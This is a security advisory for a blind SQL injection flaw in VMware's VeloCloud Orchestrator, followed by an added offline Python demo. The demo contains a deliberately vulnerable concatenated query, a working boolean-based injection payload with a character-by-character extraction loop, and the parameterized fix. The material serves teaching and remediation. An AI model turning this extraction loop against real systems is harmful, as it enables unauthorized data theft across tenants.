VMware has released a security update to address a vulnerability in VeloCloud. An attacker could exploit this vulnerability to obtain sensitive information.
Impacted Products
VMware SD-WAN by VeloCloud (VeloCloud)
Advisory Details
The VeloCloud Orchestrator does not apply correct input validation, which allows blind SQL injection. VMware has evaluated the severity of this issue to be in the Important severity range, with a maximum CVSSv3 base score of 8.5.
Known Attack Vectors
A malicious actor with tenant access to VeloCloud Orchestrator could submit specially crafted SQL queries and obtain data they are not authorized to access.
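To make the flaw class in the advisory concrete, here is an added illustrative example; it is not VeloCloud Orchestrator code, not VMware's patch, and not an exploit for CVE-2020-3973. It assumes a hypothetical multi-tenant table with a constructed dataset and shows (a) a query that concatenates a tenant-supplied filter into SQL, (b) how a boolean-based blind injection uses only an empty/non-empty response to read another tenant's row one character at a time, and (c) the parameterized form that stops it. It runs offline against an in-memory SQLite database.

```python
import sqlite3

ALPHABET = "abcdefghijklmnopqrstuvwxyz0123456789-"


def build_db():
    """Constructed sample data (hypothetical schema, not VeloCloud's).

    Two tenants each own one row; 'secret' stands in for data that must
    stay inside a tenant's own scope.
    """
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE edges (
            id        INTEGER PRIMARY KEY,
            tenant_id INTEGER NOT NULL,
            name      TEXT    NOT NULL,
            secret    TEXT    NOT NULL
        );
        INSERT INTO edges VALUES (1, 1, 'edge-a', 'tenant1-key');
        INSERT INTO edges VALUES (2, 2, 'edge-b', 'tenant2-key');
        """
    )
    return conn


def list_edges_vulnerable(conn, tenant_id, name_filter):
    """Tenant-scoped lookup that pastes the caller's filter into the SQL text.

    The tenant_id predicate looks like an access control, but the
    unvalidated name_filter lets the caller append arbitrary SQL after it.
    """
    sql = (
        f"SELECT name FROM edges WHERE tenant_id = {int(tenant_id)} "
        f"AND name LIKE '{name_filter}'"
    )
    return [row[0] for row in conn.execute(sql)]


def list_edges_fixed(conn, tenant_id, name_filter):
    """Same lookup with bound parameters: the filter is data, never SQL."""
    sql = "SELECT name FROM edges WHERE tenant_id = ? AND name LIKE ?"
    return [row[0] for row in conn.execute(sql, (int(tenant_id), name_filter))]


def blind_extract(query_fn, conn, tenant_id, target_id, max_len=32):
    """Boolean-based blind extraction through a tenant-scoped endpoint.

    Each call asks one yes/no question about a row the caller does not own;
    the only signal is whether any rows come back. The LIKE '%' prefix keeps
    the caller's own row matching, so the answer is "non-empty" exactly when
    the guessed character is right.
    """
    recovered = ""
    for pos in range(1, max_len + 1):
        match = None
        for ch in ALPHABET:
            payload = (
                f"%' AND EXISTS(SELECT 1 FROM edges WHERE id = {target_id} "
                f"AND substr(secret, {pos}, 1) = '{ch}') AND '1' = '1"
            )
            if query_fn(conn, tenant_id, payload):
                match = ch
                break
        if match is None:  # no character matched: end of the value (or injection blocked)
            break
        recovered += match
    return recovered


if __name__ == "__main__":
    db = build_db()
    # Tenant 1 reads tenant 2's secret through the concatenating query...
    print("vulnerable:", blind_extract(list_edges_vulnerable, db, 1, 2))
    # ...and gets nothing back once the query is parameterized.
    print("fixed:     ", repr(blind_extract(list_edges_fixed, db, 1, 2)))
```

The point of the example is that a `tenant_id = ...` predicate is not authorization if the rest of the statement is attacker-controlled; the fix is to bind every caller-supplied value and, as defense in depth, to enforce tenant scoping in the data access layer rather than in query text assembled per request.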
Resolution
To remediate CVE-2020-3973 apply the patches listed in the 'Fixed Version' column of the 'Response Matrix' found on the link for the Security Advisory provided below.
This advisory is available at: https://my.vmware.com/web/vmware/downloads/info/slug/networking_security/vmware_sd_wan/3_4_1.